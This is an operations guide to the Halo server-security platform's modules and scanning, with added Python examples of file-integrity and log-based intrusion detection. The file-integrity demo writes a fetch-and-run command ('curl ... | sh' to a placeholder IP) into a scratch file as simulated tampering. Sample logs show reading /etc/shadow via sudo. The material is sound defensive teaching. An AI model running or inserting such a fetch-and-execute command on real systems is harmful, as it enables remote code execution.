Using Halo Security Modules and Services
Note: This section is a summary and is not required reading. Everything discussed here is described in more detail in the module-specific Halo documents referenced below.
The capabilities of Halo to protect your server infrastructure can be grouped under several security control objectives:
- Visibility and intelligence
- Layered access control
- Security exposure management
- Compromise detection and prevention
To implement each of these broad control objectives, you'll enable one or more specific Halo security modules (for example, firewalls) to achieve both broad and deep protection for your server fleet. A given control module might contribute to more than one control objective.
For some objectives, you might need also to implement or customize one or more Halo platform services (for example, logging and alerting) to meet the objective.
Whether your goal is to meet organizational or regulatory compliance requirements, to protect valuable intellectual property, or to guard against destructive attacks on your organizational infrastructure, deploying the appropriate set of Halo modules and services can significantly strengthen the security posture of your systems and applications, regardless of architecture.
Choose the Modules and Services to Employ
Depending on the type of Halo user you are, you may have access to only a subset of these security features, or you may be able to implement them all. Implementation is in general fast and simple.
- Configuration Security Monitoring. Use this module to automatically monitor operating system and application configurations, processes, network services, privileges, and more.
Availability: Windows and Linux platforms. Implement it by creating configuration policies or cloning them from templates, and then assigning them to server groups. See the Configuration Security Monitoring Setup Guide for details.
- File Integrity Monitoring. Use this module to detect unexpected changes to the content or ownership/permissions of system binaries, configuration files, source code, and other critical files (including registry keys on Windows servers).
Availability: Windows and Linux platforms. Implement it by creating or cloning file integrity policies, running baseline scans, and assigning the baselines and policies to server groups. See the File Integrity Monitoring Setup Guide for details.
- Software Vulnerability Assessment. Use this module to scan the packages installed on your servers for known security vulnerabilities (CVEs as published in the NIST National Vulnerability Database).
Availability: Windows and Linux platforms. Implementing it requires no action; it is always enabled. See the Software Vulnerability Assessment Setup Guide for details.
- Workload Firewall Management. Use this module to centrally manage host-based firewalls including automatic updates for when servers are added, changed or retired.
Availability: Windows and Linux platforms. Available to all Halo users. Implement it by creating firewall policies and assigning them to server groups. See the Workload Firewall Management Setup Guide for details.
- Multi-Factor Network Authentication. Use this feature of the Firewall module to implement strong authentication to dynamically provision and de-provision network access for authorized users.
Availability: Windows and Linux platforms. Implement it by enabling specific users and modifying certain firewall policies. See the Multi-Factor Network Authentication Setup Guide for details.
- Server Account Management. Use this module to evaluate who has accounts on which cloud servers, what privileges they operate under, and how the accounts are being used.
Availability: Linux platforms. See the Server Account Management Setup Guide for details.
- Log-Based Intrusion Detection. Use this module to monitor system and application log files across your servers and generate alerts whenever events that could indicate compromise or attack are logged.
Availability: Windows and Linux platforms. Implement it by creating or customizing a log-based intrusion detection policy that specifies which log files to inspect and what event text or ID to alert on. See the Log-Based Intrusion Detection Setup Guide for details.
- Reporting. Use this service to conduct simple or complex parametric searches of your servers and generate reports from the results.
Availability: Windows and Linux platforms. Implementing it requires no action; it is available as long as you have Halo-protected servers. See Using Halo Reports in this document for details.
- Event logging and alerting. Use these two services to securely store events and generate real-time alerts for server creation, changes, exposures, policy violations, and more.
Availability: Windows and Linux platforms. Available to all Halo users. Implement it by flagging policy rules for logging and alerting, and by creating special events policies. See Halo Issues, Events, and Alerts for details.
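To make the File Integrity Monitoring item above concrete, here is an added, stand-alone illustration of what a baseline scan and a later rescan compare: a content hash plus the owner, group and permission bits of each regular file. This is example code written for this guide, not Halo's agent or its policy format; the scratch directory, file names and the tampering steps in demo() are constructed for the illustration.

```python
import hashlib
import os
import shutil
import stat
import tempfile


def fingerprint(path):
    """Record what a FIM baseline needs for one file: SHA-256 of content plus owner/group/mode."""
    st = os.lstat(path)
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return {"sha256": h.hexdigest(), "uid": st.st_uid, "gid": st.st_gid,
            "mode": stat.S_IMODE(st.st_mode)}


def take_baseline(root):
    """Baseline scan: fingerprint every regular file under root, keyed by path relative to root."""
    out = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.isfile(full) and not os.path.islink(full):
                out[os.path.relpath(full, root)] = fingerprint(full)
    return out


def compare(baseline, current):
    """Rescan comparison. Returns (relpath, kind, old, new) tuples sorted by path.

    kind is 'added', 'removed', or the attribute that changed ('sha256', 'uid', 'gid', 'mode').
    """
    findings = []
    for rel in sorted(set(baseline) | set(current)):
        before, after = baseline.get(rel), current.get(rel)
        if before is None:
            findings.append((rel, "added", None, after["sha256"]))
        elif after is None:
            findings.append((rel, "removed", before["sha256"], None))
        else:
            for attr in ("sha256", "uid", "gid", "mode"):
                if before[attr] != after[attr]:
                    findings.append((rel, attr, before[attr], after[attr]))
    return findings


def demo():
    """Constructed scenario: baseline a scratch tree, tamper with it, rescan, report findings."""
    root = tempfile.mkdtemp(prefix="fim-demo-")
    try:
        os.makedirs(os.path.join(root, "bin"))
        os.makedirs(os.path.join(root, "etc"))
        app = os.path.join(root, "bin", "app")
        conf = os.path.join(root, "etc", "app.conf")
        old = os.path.join(root, "etc", "old.conf")
        for path, body in ((app, b"#!/bin/sh\necho ok\n"), (conf, b"debug=0\n"), (old, b"legacy=1\n")):
            with open(path, "wb") as f:
                f.write(body)
        os.chmod(conf, 0o640)          # explicit mode so the later change is unambiguous
        base = take_baseline(root)

        # Simulated tampering between scans (constructed for the example):
        with open(app, "ab") as f:     # binary content altered
            f.write(b"curl http://203.0.113.9/x | sh\n")
        os.chmod(conf, 0o666)          # config made world-writable
        with open(os.path.join(root, "etc", "new.conf"), "wb") as f:  # unexpected new file
            f.write(b"x=1\n")
        os.remove(old)                 # monitored file deleted

        return compare(base, take_baseline(root))
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for rel, kind, before, after in demo():
        print(f"{kind:8} {rel}  {before!r} -> {after!r}")
```

A real agent also has to decide which paths a policy covers and when to refresh the baseline (after an approved package update, for instance); otherwise every legitimate change shows up as a finding alongside the malicious ones.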
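The Log-Based Intrusion Detection item above says a policy names the log files to inspect and the event text or ID to alert on. The following added example shows that logic running over a handful of constructed log lines. It is illustration code written for this guide, not Halo's policy schema or agent; the POLICY dictionary, rule names, sample lines and the brute-force threshold are all assumptions for the example.

```python
import re
from collections import defaultdict

# Hypothetical policy: log name -> list of (rule name, pattern to alert on).
POLICY = {
    "/var/log/auth.log": [
        ("ssh-auth-failure", re.compile(
            r"sshd\[\d+\]: Failed password for (invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+)")),
        ("sudo-to-root", re.compile(r"sudo:.*USER=root.*COMMAND=(?P<cmd>.+)$")),
    ],
    "windows-security": [
        ("event-4625-logon-failure", re.compile(r"\bEventID=4625\b")),
        ("event-1102-audit-log-cleared", re.compile(r"\bEventID=1102\b")),
    ],
}

# Constructed sample log content (not real captures).
SAMPLE_LOGS = {
    "/var/log/auth.log": [
        "Mar  3 10:01:02 web1 sshd[2201]: Accepted publickey for deploy from 10.0.0.5 port 52110 ssh2",
        "Mar  3 10:01:09 web1 sshd[2210]: Failed password for invalid user admin from 203.0.113.9 port 41022 ssh2",
        "Mar  3 10:01:11 web1 sshd[2211]: Failed password for root from 203.0.113.9 port 41023 ssh2",
        "Mar  3 10:01:14 web1 sshd[2212]: Failed password for root from 203.0.113.9 port 41025 ssh2",
        "Mar  3 10:02:30 web1 sudo:   deploy : TTY=pts/0 ; PWD=/home/deploy ; USER=root ; COMMAND=/bin/cat /etc/shadow",
    ],
    "windows-security": [
        "EventID=4624 Account=svc_backup LogonType=3",
        "EventID=4625 Account=Administrator LogonType=3 Source=203.0.113.9",
        "EventID=1102 Account=Administrator Audit log cleared",
    ],
}


def scan_logs(policy, logs, brute_force_threshold=3):
    """Apply each log's rules line by line; return (log, lineno, rule, fields) alerts.

    Per-line matches are the direct equivalent of a policy's 'alert on this text or ID'
    rules. The final loop adds a derived alert when one source IP accumulates
    brute_force_threshold or more SSH failures, which a single line cannot express.
    """
    alerts = []
    failures_by_ip = defaultdict(int)
    for log_name, lines in logs.items():
        for rule_name, pattern in policy.get(log_name, []):
            for lineno, line in enumerate(lines, 1):
                m = pattern.search(line)
                if not m:
                    continue
                alerts.append((log_name, lineno, rule_name, m.groupdict()))
                if rule_name == "ssh-auth-failure":
                    failures_by_ip[m.group("ip")] += 1
    for ip, count in sorted(failures_by_ip.items()):
        if count >= brute_force_threshold:
            alerts.append(("derived", None, "ssh-brute-force", {"ip": ip, "failures": count}))
    return alerts


def run_demo():
    return scan_logs(POLICY, SAMPLE_LOGS)


if __name__ == "__main__":
    for log_name, lineno, rule, fields in run_demo():
        print(f"{rule:30} {log_name}:{lineno} {fields}")
```

Note the two event classes a practitioner would add first: a cleared Windows audit log (event 1102) is itself a strong compromise indicator, and repeated failures from one address only become meaningful when counted across lines, which is why the derived rule exists.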
Where to go from here...
Consult the above-mentioned documents for the complete instructions you need to implement and manage these Halo modules. Then continue with this Operations Guide for
- Instructions for assigning security policies to server groups and running scans of your servers.
- Information needed by site administrators for ongoing Halo configuration and administration.
- Instructions for using the Halo portal's reporting service.
Assign Security Policies to Server Groups
Once you have implemented one or more Halo modules, you can then complete the setup of any of your server groups. The final step is to assign a Halo security policy to the group. In particular, you cannot use Halo Workload Firewall Management, Configuration Security Monitoring, File Integrity Monitoring, or Log-Based Intrusion Detection until you assign the appropriate policy to the appropriate group or groups.
Do that from the Halo portal Dashboard by first choosing to edit a particular server group:
Then make the policy assignment on the group's Edit Details page:
These instructions may also be found in the individual feature documents listed in the previous section.
Note also that other server-group settings you can enter on this page include Special Events Policy and Alert Profiles (described in Halo Issues, Events, and Alerts) and Server Tag (described earlier, under Automatically Assign Servers to Groups).
Once you have set up and configured one or more Halo features, use the Halo portal on an ongoing basis to scan your servers and interpret the results.
For configuration security monitoring, file integrity monitoring, software vulnerability assessment, and server account management, you can conduct scans of your servers either manually or automatically.
Configure Automatic Scans
If you are a Halo site administrator, you can enable, disable, and schedule automatic scans of your servers. Select Site Administration from the Site Administrator menu (the gears icon in the portal page header), then click the Scanner Settings tab.
For each Halo feature, select the checkbox to enable automatic scanning, and choose a scan frequency (from hourly to weekly). Select Execute scan on agent start if you want each server to be scanned as soon as its agent starts up, instead of at a default time of day. (This is recommended, because it staggers scans across the fleet rather than scanning every server on your network at the same time.)
To turn autoscanning off, clear the Enable Automatic Scanning checkbox.
You can modify certain other scan settings on this page:
- Mark finding as Failed if the check was indeterminate. See About Indeterminate Results in Monitoring Server Configuration Security for an explanation of when you might want to enable this setting for configuration scans.
- Mark finding as Critical if CVSS score is above the threshold. Default threshold value = 5.00. See Adjust the Vulnerability Threshold in Assessing Software Vulnerabilities for an explanation of when you might want to alter this value for software vulnerability scans.
Manually Scan Selected Servers
At any time, you can manually kick off a scan of a single server, a selected set of servers, or all servers in a given server group. You might want to run a manual scan if, for example, you have just remediated a reported issue or vulnerability and you don't want to wait for the next scheduled scan to verify that the issue is no longer reported in the scan results.
On the portal Dashboard, select any server group (including the root group, if desired) and scroll or search for servers of interest. Use the checkboxes to select a single server, multiple servers, or all servers in the group. Then select Launch Scan from the Actions menu. Your scan starts immediately.
Address Detected Issues and Events
After a manual or automatic scan completes, you can interpret the resulting security issues and events by consulting the scan-results screens and event tables of the Halo portal. You may also be notified through email alerts that Halo has detected security events that warrant your attention.
On the dashboard page of the Halo portal, you can view summary results of a scan of any type conducted on any of your server groups:
To view the details of an individual server's scan results, navigate from the dashboard page to the server scan results page, showing details of any security issues that may have been uncovered during the scan:
For full information on how to view, interpret, and act upon Halo scan results, see Halo Issues, Events, and Alerts: Addressing Scan Results and Security Notifications.